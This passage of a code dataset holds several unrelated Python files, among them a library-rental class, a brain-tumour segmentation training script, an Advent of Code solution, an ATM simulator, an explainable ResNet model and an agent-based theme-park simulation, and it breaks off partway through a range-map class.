run()\n","repo_name":"kelseyleewerner/dataflow_beam_pipeline","sub_path":"stream_pipeline.py","file_name":"stream_pipeline.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32468137219","text":"\n# Equipe: Mauricio, Tiago, Cassio\n\nfrom biblioteca import Biblioteca\nfrom livro import Livro\n\nclass Locacao(Livro):\n def __init__(id_livro, titulo, autor, paginas, ano_publicacao, numero_exemplares, aluguel_diario,usuario, livro_locado, data_locacao, prazo_devolucao, data_devolucao, multa_atraso):\n super().__init__(id_livro, titulo, autor, paginas, ano_publicacao, numero_exemplares, aluguel_diario)\n self._pendentes = []\n self._usuario = usuario\n self._livro_locado = livro_locado\n self._data_locacao= data_locacao\n self._prazo_devolucao= prazo_devolucao\n self._data_devolucao = data_devolucao\n self._multa_atraso= multa_atraso\n \n\n\n if self.npendente():\n print(\"nao è possivel locar livro pois você esta com pendencias\")\n return 0\n if self.sobrando():\n print(\"nao è possivel locar livro pois nao tem mais exemplares\")\n return 0\n \n\n @property\n def usuario(self):\n return self._usuario\n\n def pendentes(self, usuario):\n self._pendentes.append(usuario)\n\n\n\n\n\n def npendente(self, usuario):\n if usuario in self._pendentes:\n return True\n else:\n return False\n\n def sobrando(self):\n if self._numero_exemplares == 0:\n return True\n else:\n return False\n\n\n\n def mostrar_detalhes(self):\n Biblioteca.mostrar_detalhes_livros(self._titulo, self._autor, self._ano_publicacao, self._aluguel_diario)","repo_name":"Mauricio41/maratona_ds","sub_path":"Biblioteca/locacao.py","file_name":"locacao.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"6528152495","text":"import torch\nimport torch.optim as optim\nfrom Unet_3D import UNet\nfrom Res_Unet_3D import Res_UNet\nfrom Vnet_3D import VNet\nfrom torch.utils.data import DataLoader\nfrom Brats_dataset import BratsDataset\nfrom Brats_sampler import BratsSampler\nfrom torchvision import transforms\nfrom transformations import random_flip, random_rotate90, random_intensity_scale, random_intensity_shift\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\nfrom training import train_model\nfrom testing import test_model\nmove_to_cuda = True\n\ndef main():\n ##########DEFINE DATASET##########\n torch.manual_seed(0)\n len_dataset = 332 #data that is not test\n transform = transforms.Compose([random_flip(),\n random_rotate90(),\n random_intensity_scale(),\n random_intensity_shift()])\n dataset = BratsDataset(patch_size=96, len_dataset=len_dataset, transform=transform,\n patching='CENTER_TUMOR', is_test=False)\n dataset_sizes = [295,37] #about 80% train and 37 for test\n train_dataset, validation_dataset = torch.utils.data.random_split(dataset, dataset_sizes)\n test_dataset = BratsDataset(patch_size=96, len_dataset=37, transform = None,\n patching='RANDOM', is_test=True)\n \n ##########DEFINE DATALOADER##########\n batch_size = 1 #for space reasons\n train_dataloader = DataLoader(dataset = train_dataset,\n batch_size=batch_size, shuffle=False)\n validation_dataloader = DataLoader(dataset = validation_dataset,\n batch_size=batch_size, shuffle=False)\n test_dataloader = DataLoader(dataset = test_dataset,\n batch_size=batch_size, shuffle=False)\n validation_ratio = 40\n ###[1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6, 1e-7, 1e-8, 1e-9, 1e-10 ,1e-11, 1e-12]:\n plt.clf()\n for lr in [1e-3]:\n ##########MODEL##########\n model = Res_UNet() \n for param in model.parameters():\n param.requires_grad = True\n # move the model to the GPU\n if move_to_cuda:\n model = model.to(\"cuda\")\n ##########TRAIN##########\n print(\"lr \", lr)\n w_decay = 1e-5\n optimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=w_decay)\n #class_weight = torch.cuda.FloatTensor([1,1,1,1]) #find the correct weights\n class_weight = torch.cuda.FloatTensor([0.1,0.35,0.2,0.35])\n nepochs = 1\n batch_size = 2\n train_losses, valid_losses, model = train_model(model, optimizer, train_dataloader,\n validation_dataloader, class_weight,\n nepochs, batch_size, validation_ratio,\n dataset_sizes)\n\n #######PATHS##########\n folder_path = '/home/mc/Brain_Tumor_Segmentation/model_stats/'\n model_path = 'FirstDebuggSave_ResUNet_lrDecrease_withClassWeights_nepochs'+str(nepochs)+'_batch'+str(batch_size)+'_lr'+ str(lr)\n\n\n ###################\n ###TRAINING DATA###\n ###################\n\n #######VISUALIZE TRAINING RESULTS##########\n print(\"train losses\", train_losses)\n print(\"validation losses\", valid_losses)\n plt.plot(train_losses, 'b', label = \"train_losses\")\n plt.plot(valid_losses, 'g', label = \"validation_losses\")\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.legend()\n \n #######SAVE FIGS##########\n fig_path = folder_path + 'Training_Fig_' + model_path + '.png'\n plt.savefig(fig_path)\n plt.clf()\n \n ##########SAVE MODEL##########\n model_name = \"Model_\" + model_path +\".model\"\n model.eval()\n save_model_path = os.path.join(folder_path, model_name)\n torch.save(model.state_dict(), save_model_path)\n print(\"saved model to path\")\n\n ##########SAVE TRAIN LOSS LISTS##########\n train_loss_file_name = folder_path + 'TrainLosses_'+model_path+ \".pkl\"\n train_loss_file = open(train_loss_file_name,\"wb\")\n pickle.dump(train_losses,train_loss_file)\n train_loss_file.close()\n valid_loss_file_name = folder_path + 'ValidLosses_'+model_path+ \".pkl\"\n valid_loss_file = open(valid_loss_file_name,\"wb\")\n pickle.dump(valid_losses,valid_loss_file)\n valid_loss_file.close()\n\n ###################\n #######TEST########\n ###################\n test_dice_losses, test_hausdorff_losses, average_dice_loss, average_hausdorff_loss = test_model(model, test_dataloader, class_weight)\n \n #######VISUALIZE TEST##########\n print(\"test dice losses\", test_dice_losses)\n plt.plot(test_dice_losses, 'b', label = \"test_dice_losses\")\n plt.plot(test_hausdorff_losses, 'g', label = \"test_hausdorff_losses\")\n plt.xlabel('images')\n plt.ylabel('loss')\n plt.legend()\n\n #######SAVE TEST FIGS##########\n fig_path = folder_path + 'Testing_Fig_' + model_path + '.png'\n plt.savefig(fig_path)\n plt.clf()\n\n ########SAVE TEST LOSS LISTS##########\n test_dice_loss_file_name = folder_path + 'TestDiceLosses_'+model_path+ \".pkl\"\n test_dice_loss_file = open(test_dice_loss_file_name,\"wb\")\n pickle.dump(test_dice_losses,test_dice_loss_file)\n test_dice_loss_file.close()\n test_hausdorff_loss_file_name = folder_path + 'TestHausdorffLosses_'+model_path+ \".pkl\"\n test_hausdorff_loss_file = open(test_hausdorff_loss_file_name,\"wb\")\n pickle.dump(test_hausdorff_losses,test_hausdorff_loss_file)\n test_hausdorff_loss_file.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maayanchechik/Brain_Tumor_Segmentation","sub_path":"train_test_save_model.py","file_name":"train_test_save_model.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17242963185","text":"\ntest = list(open('test.txt', 'r'))\ninput = list(open('input.txt', 'r'))\n\n\nmy_input = input\n\nfor i in my_input:\n letters = list(i)\n \n# print(letters)\n\ndef get_quad(string, index):\n \n return string[index:index+4]\n\ndef get_fourteen(string, index):\n \n return string[index:index+14]\n\ndef part_1(string):\n for i, v in enumerate(string):\n \n my_list = get_quad(string, i)\n \n if len(my_list) == len(set(my_list)):\n return (i + 4)\n break\n\ndef part_2(string):\n for i, v in enumerate(string):\n \n my_list = get_fourteen(string, i)\n \n if len(my_list) == len(set(my_list)):\n return (i + 14)\n break\n\nprint(f'Part 1: {part_1(letters)}')\nprint(f'Part 2: {part_2(letters)}')\n \n ","repo_name":"bendpannell/Advent-of-Code","sub_path":"2022/Day 6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7650902001","text":"#!python27\nimport os, random, time\n'''\nATM Simulator \nAuthor : S.Haseeb\nRegistered Account: 1111111111111111\nPasswd: 1234\n'''\nclass ATM:\n def __init__(self):\n self.AMOUNT = random.randint(500, 100000)\n self.USERS = {'1111111111111111':'1234'}\n def run(self):\n os.system('cls')\n while True:\n print (' ATM V1.0')\n print ('[ Welcome to Python Bank ]\\n')\n print (' Enter your Debit Card No.')\n self.NO = raw_input('<<< ')\n os.system('cls')\n if len(self.NO) == 16:\n break\n else:\n print ('[Error]:\\nATM number is 16 digits long.\\n') \n\n while True:\n os.system('cls')\n print (' Enter the 4 digit PIN')\n self.PIN = raw_input('<<< ')\n if len(self.PIN) == 4:\n break\n else:\n print ('[Error]:\\nPIN must be 4 digits long.\\n')\n\n if self.NO in self.USERS:\n if self.USERS[self.NO] == self.PIN:\n self.logged()\n \n def logged(self):\n os.system('cls')\n print ('Logged in as %s' %self.NO)\n print ('Current Balance: %s $\\n' %self.AMOUNT)\n print (' 1) Withdraw')\n print (' 2) Change PIN')\n print (' 3) Logout')\n selection = raw_input('<<< ')\n \n if selection == '1':\n os.system('cls')\n print (' Amount ($) :')\n cash = raw_input('<<< ')\n if int(cash) <= self.AMOUNT:\n self.AMOUNT -= int(cash)\n print ('Withdrawl Successful')\n elif int(cash) > self.AMOUNT:\n print ('We don\\'t give Loans.')\n\n time.sleep(2)\n os.system('cls')\n self.logged()\n \n if selection == '2':\n while True:\n print (' Enter New PIN:')\n pin = raw_input('<<< ')\n if len(pin) == 4:\n self.USERS[self.NO] = pin\n print ('PIN change successful.')\n break\n else:\n print ('[Error]:\\nPIN must be 4 digit long.\\n')\n time.sleep(2)\n time.sleep(2)\n os.system('cls')\n self.logged()\n \n if selection == '3':\n os.system('cls')\n print (' Logout Succesful ')\n time.sleep(2)\n self.run()\n \nif __name__ == '__main__':\n import platform\n if platform.system().lower() == 'windows':\n ATM().run()\n else:\n print('This program can only run on windows.')\n print('To run on other OS be brave enough to change')\n print('os.system(\\'cls\\')')\ntime.sleep(4)\n","repo_name":"yesIamHasi/Machine-Emulations","sub_path":"ATM-Emulator.py","file_name":"ATM-Emulator.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39463514454","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom utils.lrp_general6 import *\n\nclass Cannotloadmodelweightserror(Exception):\n pass\n\nclass Modulenotfounderror(Exception):\n pass\n\nclass BasicBlock_kuangliu_c(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock_kuangliu_c, self).__init__()\n self.conv1 = nn.Conv2d(\n in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n self.elt = sum_stacked2()\n self.somerelu= nn.ReLU()\n\n def forward(self, x):\n out = self.somerelu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n #out += self.shortcut(x)\n out = self.elt( torch.stack([out, self.shortcut(x) ], dim=0))\n out = self.somerelu(out)\n return out\n\n\nclass Bottleneck_kuangliu_c(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck_kuangliu_c, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion *\n planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n self.elt = sum_stacked2()\n self.somerelu= nn.ReLU()\n\n def forward(self, x):\n out = self.somerelu(self.bn1(self.conv1(x)))\n out = self.somerelu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n #out += self.shortcut(x)\n out = self.elt( torch.stack([out, self.shortcut(x) ], dim=0))\n out = self.somerelu(out)\n return out\n\n\nclass ResNet_kuangliu_c(nn.Module):\n def __init__(self, block, num_blocks, num_classes=10):\n super(ResNet_kuangliu_c, self).__init__()\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = nn.Linear(512*block.expansion, num_classes)\n\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.somerelu= nn.ReLU()\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.somerelu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n\n #out = F.avg_pool2d(out, 4)\n #out = out.view(out.size(0), -1)\n out = self.avgpool(out)\n out = torch.flatten(out, 1)\n\n out = self.linear(out)\n return out\n\n def setbyname(self, name, value):\n\n def iteratset(obj, components, value):\n\n if not hasattr(obj, components[0]):\n return False\n elif len(components) == 1:\n setattr(obj, components[0], value)\n # print('found!!', components[0])\n # exit()\n return True\n else:\n nextobj = getattr(obj, components[0])\n return iteratset(nextobj, components[1:], value)\n\n components = name.split('.')\n success = iteratset(self, components, value)\n return success\n\n\n def copyfromresnet(self, net, lrp_params, lrp_layer2method):\n # assert not (isinstance(net, ResNet) or isinstance(net, ResNet_kuangliu_c))\n assert not isinstance(net, ResNet_kuangliu_c)\n\n # --copy linear\n # --copy conv2, while fusing bns\n # --reset bn\n\n # first conv, then bn,\n # means: when encounter bn, find the conv before -- implementation dependent\n\n updated_layers_names = []\n\n last_src_module_name = None\n last_src_module = None\n\n for src_module_name, src_module in net.named_modules():\n #print('at src_module_name', src_module_name)\n\n foundsth = False\n\n if isinstance(src_module, nn.Linear):\n # copy linear layers\n foundsth = True\n #print('is Linear')\n # m = oneparam_wrapper_class( copy.deepcopy(src_module) , linearlayer_eps_wrapper_fct(), parameter1 = linear_eps )\n wrapped = get_lrpwrapperformodule(copy.deepcopy(src_module),\n lrp_params, lrp_layer2method)\n if False == self.setbyname(src_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + src_module_name + \" in target net to copy\")\n updated_layers_names.append(src_module_name)\n # end of if\n\n if isinstance(src_module, nn.Conv2d):\n # store conv2d layers\n foundsth = True\n #print('is Conv2d')\n last_src_module_name = src_module_name\n last_src_module = src_module\n # end of if\n\n if isinstance(src_module, nn.BatchNorm2d):\n # conv-bn chain\n foundsth = True\n #print('is BatchNorm2d')\n\n if (True == lrp_params['use_zbeta']) and (\n last_src_module_name == 'conv1'):\n thisis_inputconv_andiwant_zbeta = True\n else:\n thisis_inputconv_andiwant_zbeta = False\n\n m = copy.deepcopy(last_src_module)\n m = bnafterconv_overwrite_intoconv(m, bn=src_module) # outcomment if you want no conv-bn fusion\n # wrap conv\n wrapped = get_lrpwrapperformodule(m, lrp_params,\n lrp_layer2method,\n thisis_inputconv_andiwant_zbeta=thisis_inputconv_andiwant_zbeta)\n\n if False == self.setbyname(last_src_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + nametofind + \" in target net to copy\")\n\n updated_layers_names.append(last_src_module_name)\n\n # wrap batchnorm\n wrapped = get_lrpwrapperformodule(resetbn(src_module), lrp_params, lrp_layer2method) # outcomment if you want no conv-bn fusion\n #wrapped = get_lrpwrapperformodule(src_module, lrp_params, lrp_layer2method) # outcomment if you want no conv-bn fusion\n if False == self.setbyname(src_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + src_module_name + \" in target net to copy\")\n updated_layers_names.append(src_module_name)\n # end of if\n\n # if False== foundsth:\n # print('!untreated layer')\n # print('\\n')\n\n # sum_stacked2 is present only in the targetclass, so must iterate here\n for target_module_name, target_module in self.named_modules():\n\n if isinstance(target_module,\n (nn.ReLU, nn.AdaptiveAvgPool2d, nn.MaxPool2d)):\n wrapped = get_lrpwrapperformodule(target_module, lrp_params,\n lrp_layer2method)\n\n if False == self.setbyname(target_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + src_module_name + \" in target net to copy\")\n updated_layers_names.append(target_module_name)\n\n if isinstance(target_module, sum_stacked2):\n\n wrapped = get_lrpwrapperformodule(target_module, lrp_params,\n lrp_layer2method)\n if False == self.setbyname(target_module_name, wrapped):\n raise Modulenotfounderror(\n \"could not find module \" + target_module_name + \" in target net , impossible!\")\n updated_layers_names.append(target_module_name)\n '''\n for target_module_name, target_module in self.named_modules():\n if target_module_name not in updated_layers_names:\n print('not updated:', target_module_name)\n '''\n\n\ndef ResNet18_kuangliu_c():\n return ResNet_kuangliu_c(BasicBlock_kuangliu_c, [2, 2, 2, 2])\n\ndef ResNet50_kuangliu_c():\n return ResNet_kuangliu_c(Bottleneck_kuangliu_c, [3, 4, 6, 3])\n","repo_name":"seulkiyeom/LRP_pruning","sub_path":"modules/resnet_kuangliu.py","file_name":"resnet_kuangliu.py","file_ext":"py","file_size_in_byte":10014,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"51"} +{"seq_id":"33757058748","text":"from mesa import Agent\nimport random\nimport math\ntry:\n from .route import Route\nexcept:\n from route import Route\nimport numpy as np\nimport math\n\n\n\nclass Customer(Agent):\n def __init__(self, unique_id, model, pos, strategy, weight, adaptive):\n super().__init__(unique_id, model)\n\n \"\"\"\n Args:\n id (int): a unique id to represent the agent\n model (Themepark): the model to link the agent to\n pos (tuple(int,int)): the position of the agent (x,y)\n strategy (str): indicates if agent uses a strategy or behaves randomly\n weight (float): float indicating the weight given to distance and queuetime\n adaptive (bool): if true, agent can switch strategies through run\n \"\"\"\n self.pos = pos\n self.model = model\n self.current_a = None\n self.strategy = strategy\n self.history = self.make_history()\n self.weight = weight\n if self.weight == \"Random_test_4\":\n self.strategy = \"Random_test_4\"\n self.adaptive = adaptive\n self.all_strategies = [x for x in self.model.strategies if x != 'Random_test_4']\n\n if self.strategy == 'Random' or self.strategy == \"Random_test_4\":\n self.destination = random.choice(self.model.positions)\n while self.destination is self.pos:\n self.destination = random.choice(self.model.positions)\n\n if self.strategy == 'Closest_by':\n self.destination = self.use_strategy().pos\n\n self.waitingtime = None\n self.waiting = False\n self.total_ever_waited = 0\n self.nmbr_attractions = 0\n self.waited_period = 0\n self.in_attraction = False\n self.in_attraction_list = []\n self.prediction_strategies = self.prediction_all_strategies()\n self.strategy_swap_hist = 0\n\n def make_history(self):\n \"\"\"\n This method provides the framework for the customer attraction history\n \"\"\"\n\n history = {}\n attractions = self.model.attractions\n for attraction in range(len(attractions)):\n history[attractions[attraction]] = 0\n\n return history\n\n def penalty(self, current_attraction):\n \"\"\"\n This method calculates and returns a penalty for attractions that were visited more\n often than other attractions.\n Args:\n current_attraction (Attraction): the attraction object the method calculates\n a penalty for.\n \"\"\"\n\n\n total_difference_sum = 0\n\n if current_attraction == 0:\n return 0\n\n # calculates the difference between how much the current attraction was visited\n # and how much all other attractions were visited\n for i in range(len(self.model.attractions.values())):\n attraction = self.model.attractions[i]\n\n difference = self.history[current_attraction] - self.history[attraction]\n\n # update the total difference\n total_difference_sum += difference\n\n if total_difference_sum < 0:\n total_difference_sum = 0\n\n # calculates penalty by multiplying with a determinsitc value\n penalty = (total_difference_sum * self.model.penalty_per)/100\n\n return penalty\n\n def move(self):\n '''\n This method should get the neighbouring cells (Moore's neighbourhood),\n select one closest to the destination, and move the agent there.\n '''\n\n possible_steps = self.model.grid.get_neighborhood(\n self.pos,\n moore=True,\n radius=1,\n include_center=False\n )\n\n # chooses random step\n temp = random.choice(possible_steps)\n\n # Loop over every possible step to get fastest step\n for step in possible_steps:\n\n # check if step is closer to destination\n if (abs(step[0] - self.destination[0]) < abs(temp[0] - self.destination[0]) or\n abs(step[1] - self.destination[1]) < abs(temp[1] - self.destination[1])):\n temp = step\n\n new_position = temp\n\n if new_position == self.destination and self.waiting is False:\n self.model.grid.move_agent(self, new_position)\n\n # Get object of current attraction\n attractions = self.model.get_attractions()\n for attraction in attractions:\n if attraction.pos == new_position:\n current_a = attraction\n self.current_a = current_a\n\n self.set_waiting_time()\n self.waiting = True\n\n # Extra check to see if agent is at destination\n if self.check_move() is True:\n self.model.grid.move_agent(self, new_position)\n\n def check_move(self):\n \"\"\" Checks if a move can be done, given a new position.\"\"\"\n\n\n if self.waitingtime is not None:\n\n # set in ride to true false\n if self.current_a is not None:\n if self.waited_period == self.waitingtime - self.current_a.attraction_duration:\n self.in_attraction = True\n\n # CHANGE DIRECTION if waitingtime is met\n if self.waitingtime <= self.waited_period:\n\n # when attraction is left set self.attraction to false\n self.in_attraction = False\n\n # Update goals and attraction\n for attraction in self.model.get_attractions():\n if attraction.pos == self.pos:\n if attraction.N_current_cust > 0:\n attraction.N_current_cust -= 1\n self.model.attraction_history[attraction][self.model.totalTOTAL] -=1\n\n # if agent is next in line\n if self.waitingtime == self.waited_period:\n\n if self.current_a is not None:\n self.history[self.current_a] += 1\n\n # Only update when adaptive strategy is on\n if self.adaptive is True:\n if self.strategy is not \"Random\":\n if self.strategy is not \"Random_test_4\":\n self.update_strategy()\n\n # increment number of rides taken of attraction\n # if self.current_a is not None:\n self.current_a.rides_taken += 1\n\n # increment number of rides taken of customer\n self.nmbr_attractions += 1\n self.total_ever_waited += self.waited_period\n self.waited_period = 0\n\n # set current attraction back to None when customer leaves.\n self.current_a = None\n\n # decide on new destination\n if self.strategy == \"Closest_by\":\n self.destination = self.use_strategy().pos\n elif self.strategy == 'Random' or self.strategy == \"Random_test_4\":\n self.destination = random.choice(self.model.positions)\n while self.destination is self.pos:\n self.destination = random.choice(self.model.positions)\n self.waiting = False\n self.waited_period = 0\n\n if self.pos == self.destination:\n\n # Check which attraction\n attractions = self.model.get_attractions()\n for attraction in attractions:\n if attraction.pos == self.pos:\n self.current_a = attraction\n\n # self.current_a. += 1\n self.waited_period += 1\n\n if self.waiting is False:\n return True\n return False\n\n def set_waiting_time(self):\n '''\n This method calculates the waiting time of the customer based on the\n number of customers in line, and the duration of the attraction\n '''\n attractions = self.model.get_attractions()\n attraction = None\n for i in attractions:\n if self.pos == i.pos:\n attraction = i\n break\n\n # update waitingtime of attraction\n attraction.N_current_cust += 1\n\n self.model.attraction_history[attraction][self.model.totalTOTAL] +=1\n attraction.calculate_waiting_time()\n\n # add waiting time to agent\n self.waitingtime = attraction.current_waitingtime\n\n def get_walking_distances(self):\n \"\"\"\n Returns dictionary of attraction-ids with their distances as values.\n Function uses pythagoras formula.\n \"\"\"\n attractions = self.model.get_attractions()\n\n distances = {}\n for attraction in attractions:\n\n # Stelling van pythagoras\n p1, p2 = self.pos, attraction.pos\n dist = math.sqrt(((p1[0]-p2[0])**2)+((p1[1]-p2[1])**2))\n distances[attraction.unique_id] = dist\n\n # Sort by shortest distance\n indexes = []\n {indexes.append(k): v for k, v in sorted(distances.items(), key=lambda item: item[1])}\n return distances\n\n def get_waiting_lines(self):\n \"\"\"\n Returns dictionary of attracion-ids with their waiting lines as values.\n \"\"\"\n people = self.model.calculate_people_sorted()\n return people\n\n def update_strategy(self):\n \"\"\"\n Updates the strategy by evaluating the attractions chosen by all other\n strategies. The strategy that would have resulted in the earliest access\n to a ride is chosen as the next strategy. Only used if adaptive = True.\n \"\"\"\n\n # dictionary of strategies that were better than the current\n strategy_ranking = {}\n queues = self.get_waiting_lines()\n chosen_strategy = self.weight\n current_walking_distance = self.prediction_strategies[chosen_strategy][1]\n current_arrival_time = math.ceil(self.prediction_strategies[chosen_strategy][2])\n\n if self.current_a is not None:\n\n for strategy in self.prediction_strategies.keys():\n\n # does not need compare the current strategy to itself\n if strategy == chosen_strategy:\n continue\n\n attraction = self.prediction_strategies[strategy][0]\n arrival_time = math.ceil(self.prediction_strategies[strategy][2])\n walking_distance = self.prediction_strategies[strategy][1]\n\n # if the strategy predicted the same attraction, the old strategy\n # is prefered\n if attraction == self.current_a:\n continue\n\n # if the arrival time at the predicted attraction isn't in the future\n if math.ceil(arrival_time) < self.model.totalTOTAL:\n\n queue_at_arrival = self.model.attraction_history[attraction][math.ceil(arrival_time)]\n\n # if the ride would have been finished earlier, add this strategy to ranking\n if arrival_time + queue_at_arrival + attraction.attraction_duration < self.model.totalTOTAL:\n\n strategy_ranking[strategy] = arrival_time + queue_at_arrival\n\n # choose the strategy with the best time\n if len(strategy_ranking.values()) > 0:\n minval = min(strategy_ranking.values())\n res = [k for k, v in strategy_ranking.items() if v == minval]\n if len(res) is 1:\n best_strat = res[0]\n else:\n\n # if two strategies had the same outcome, choose randomly\n best_strat = random.choice(res)\n self.weight = best_strat\n\n def step(self):\n \"\"\"\n This method should move the customer using the `random_move()` method.\n \"\"\"\n\n # updates the data on the attraction occupation\n if self.in_attraction is True:\n self.in_attraction_list.append(1)\n else:\n self.in_attraction_list.append(0)\n\n self.move()\n\n def use_strategy(self):\n \"\"\"\n This method returns the attraction predicted by the current strategy of\n the customer. Adds a deterministic penalty per attraction based\n on the penalty method.\n \"\"\"\n\n # add walking times\n predictions = self.get_walking_distances()\n\n # add waitingtimes\n waiting_times = self.get_waiting_lines()\n\n # make prediction based on the current strategy for all attractions\n for i in range(len(predictions.keys())):\n predictions[i] = predictions[i] * (1 - self.weight) + waiting_times[i] * self.weight\n\n # use a fraction of the attraction with the highest cost as a penalty\n maxval = max(predictions.values())\n for attraction_nr in predictions:\n penalty = self.penalty(self.model.attractions[attraction_nr])\n predictions[attraction_nr] = predictions[attraction_nr] + maxval * penalty\n\n # choose the attraction with the lowest cost\n minval = min(predictions.values())\n res = [k for k, v in predictions.items() if v == minval]\n if len(res) is 1:\n predicted_attraction = res[0]\n else:\n\n # if attractions have the same cost, choose one randomly\n predicted_attraction = random.choice(res)\n\n attraction_object = self.model.get_attractions()[predicted_attraction]\n\n # make predicitons for all strategies\n self.prediction_strategies = self.prediction_all_strategies()\n\n return self.model.attractions[predicted_attraction]\n\n def prediction_all_strategies(self):\n \"\"\"\n Makes a prediction for all possible strategies.\n Returns a dictionary with the strategies as keys and the attractions,\n predictions and arrival times as value\n \"\"\"\n\n prediction_per_strategy = {}\n\n # add walking distances\n predictions = self.get_walking_distances()\n\n # add waitingtimes\n waiting_times = self.get_waiting_lines()\n\n # make a prediction for all srategies\n for weight in self.all_strategies:\n\n # make prediction based on the current strategy for all attractions\n for i in range(len(predictions.keys())):\n\n if self.weight is None:\n predictions[i] = predictions[i] + waiting_times[i]\n else:\n predictions[i] = predictions[i] * (1 - weight) + waiting_times[i] * weight\n\n # use a fraction of the attraction with the highest cost as a penalty\n maxval = max(predictions.values())\n for attraction_nr in predictions:\n penalty = self.penalty(self.model.attractions[attraction_nr])\n\n predictions[attraction_nr] = predictions[attraction_nr] + maxval * penalty\n\n # choose the attraction with the lowest cost\n minval = min(predictions.values())\n res = [k for k, v in predictions.items() if v == minval]\n if len(res) is 1:\n predicted_attraction = res[0]\n else:\n\n # if attractions have the same cost, choose randomly\n predicted_attraction = random.choice(res)\n\n attraction_object = self.model.get_attractions()[predicted_attraction]\n predictions = self.get_walking_distances()\n arrival_time = self.model.totalTOTAL + predictions[predicted_attraction]\n\n # add to dictionary\n prediction_per_strategy[weight] = [self.model.attractions[predicted_attraction], predictions[predicted_attraction],\n arrival_time]\n return prediction_per_strategy\n","repo_name":"AnnemijnD/ABMFinal","sub_path":"models/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":15650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73778501279","text":"from bisect import bisect_left\nfrom collections import deque, Hashable\nfrom sdata.contrib.ranger.collections.rangemap import RangeMap\nfrom sdata.contrib.ranger.range.range import Range\nfrom sdata.contrib.ranger.range.cut import Cut\n\nclass RangeBucketMap(RangeMap):\n \"\"\" Class used to represent a mapping of disjoint ranges to sets of items. Ranges\n do not coalesce. However, if a new Range is added over an existing Range, items\n belonging to the existing Range are retained in that Range\n \"\"\"\n\n def __init__(self, range_dict=None):\n \"\"\" Instantiates a RangeBucketMap\n\n Parameters\n ----------\n range_dict : Dictionary of Range -> object\n Dictionary to start off the RangeBucketMap with\n \"\"\"\n self.recurse_add = False\n super(RangeBucketMap, self).__init__(range_dict)\n\n def iteritems(self, start=None, end=None):\n \"\"\" Iterates over pairs of (Range, value)\n\n Parameters\n ----------\n start : comparable, optional\n The starting point for iterating, inclusive\n end : comparable, optional\n The ending point for iterating, inclusive\n\n Returns\n -------\n Generator of (Range intersecting [start,end], value), ordered by start point\n \"\"\"\n if start is None:\n start = self.lower_cuts[0]\n else:\n start = Cut.below_value(start)\n if end is None:\n end = self.upper_cuts[-1]\n else:\n end = Cut.above_value(end)\n bounding_range = Range(start, end)\n # Get the bounding indices\n ovlapLowerInd = 